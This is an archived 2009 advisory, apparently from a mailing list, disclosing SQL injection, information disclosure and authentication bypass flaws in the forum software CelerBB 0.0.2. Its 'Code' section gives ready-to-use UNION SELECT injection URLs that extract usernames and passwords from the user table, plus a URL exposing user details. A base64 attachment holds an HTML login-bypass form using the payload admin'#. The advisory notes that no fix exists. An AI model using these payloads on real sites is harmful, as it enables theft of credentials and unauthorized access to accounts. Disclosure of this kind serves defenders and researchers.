AOH :: HP Unsorted C :: VA2772.HTM

CelerBB 0.0.2 Multiple Vulnerabilities



CelerBB 0.0.2 Multiple Vulnerabilities
CelerBB 0.0.2 Multiple Vulnerabilities



--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website: http://celerbb.sourceforge.net/ 

[+] Bugs: [A] Multiple SQL Injection
          [B] Information Disclosure
          [C] Authenticaion Bypass

[+] Exploitation: Remote
[+] Date: 05 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewforum.php, viewtopic.php

This bug allows a guest to view username and
password list.


- [B] Information Disclosure

[-] Requisites: none
[-] File affected: showme.php

This bug allows a guest to view reserved
information of any user.


- [C] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass authentication.


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 
1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM
celer_users%23

http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 
1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL
FROM celer_users%23


- [B] Information Disclosure

http://www.site.com/path/showme.php?user=admin 


- [C] Authentication Bypass


  
    CelerBB 0.0.2 Authentication Bypass Exploit
  
  
    
************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --001636c59672d0b3940464601c3f Content-Type: text/plain; charset=US-ASCII; name="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt" Content-Disposition: attachment; filename="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_frxjjqnq0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBDZWxlckJCClsrXSBWZXJzaW9uOiAwLjAuMgpbK10gV2Vic2l0ZTogaHR0cDov L2NlbGVyYmIuc291cmNlZm9yZ2UubmV0LwoKWytdIEJ1Z3M6IFtBXSBNdWx0aXBsZSBTUUwgSW5q ZWN0aW9uCiAgICAgICAgICBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQogICAgICAgICAgW0Nd IEF1dGhlbnRpY2Fpb24gQnlwYXNzCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6 IDA1IE1hciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBG cmVzdGEKWytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRh Y3Q6IGUtbWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2Rl CjMpIEZpeAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioKClsrXSBCdWdzCgoKLSBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlvbgoKWy1dIFJlcXVpc2l0 ZXM6IG1hZ2ljX3F1b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IHZpZXdmb3J1bS5w aHAsIHZpZXd0b3BpYy5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgdXNlcm5h bWUgYW5kCnBhc3N3b3JkIGxpc3QuCgoKLSBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQoKWy1d IFJlcXVpc2l0ZXM6IG5vbmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IHNob3dtZS5waHAKClRoaXMgYnVn IGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgcmVzZXJ2ZWQKaW5mb3JtYXRpb24gb2YgYW55IHVzZXIu CgoKLSBbQ10gQXV0aGVudGljYXRpb24gQnlwYXNzCgpbLV0gUmVxdWlzaXRlczogbWFnaWNfcXVv dGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogbG9naW4ucGhwCgpUaGlzIGJ1ZyBhbGxv d3MgYSBndWVzdCB0byBieXBhc3MgYXV0aGVudGljYXRpb24uCgoKKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBs ZSBTUUwgSW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlld2ZvcnVtLnBocD9p ZD0tMScgVU5JT04gQUxMIFNFTEVDVCAxLDIsR1JPVVBfQ09OQ0FUKENPTkNBVCh1c2VybmFtZSwg MHgzYSwgcGFzc3dvcmQpKSw0LDUsNiw3LDggRlJPTSBjZWxlcl91c2VycyUyMwoKaHR0cDovL3d3 dy5zaXRlLmNvbS9wYXRoL3ZpZXd0b3BpYy5waHA/aWQ9MScgVU5JT04gQUxMIFNFTEVDVCAxLDIs MyxOVUxMLDUsNixHUk9VUF9DT05DQVQoQ09OQ0FUKHVzZXJuYW1lLCAweDNhLCBwYXNzd29yZCkp LE5VTEwgRlJPTSBjZWxlcl91c2VycyUyMwoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1cmUK Cmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9zaG93bWUucGhwP3VzZXI9YWRtaW4KCgotIFtDXSBB dXRoZW50aWNhdGlvbiBCeXBhc3MKCjxodG1sPgogIDxoZWFkPgogICAgPHRpdGxlPkNlbGVyQkIg MC4wLjIgQXV0aGVudGljYXRpb24gQnlwYXNzIEV4cGxvaXQ8L3RpdGxlPgogIDwvaGVhZD4KICA8 Ym9keT4KICAgIDxmb3JtIGFjdGlvbj0ibG9naW4ucGhwIiBtZXRob2Q9IlBPU1QiPgogICAgICA8 aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJVc2VybmFtZSIgdmFsdWU9ImFkbWluJyMiPgogICAg ICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAgICA8L2Zvcm0+CiAgPC9i b2R5Pgo8L2h0bWw+CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKio--001636c59672d0b3940464601c3f--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.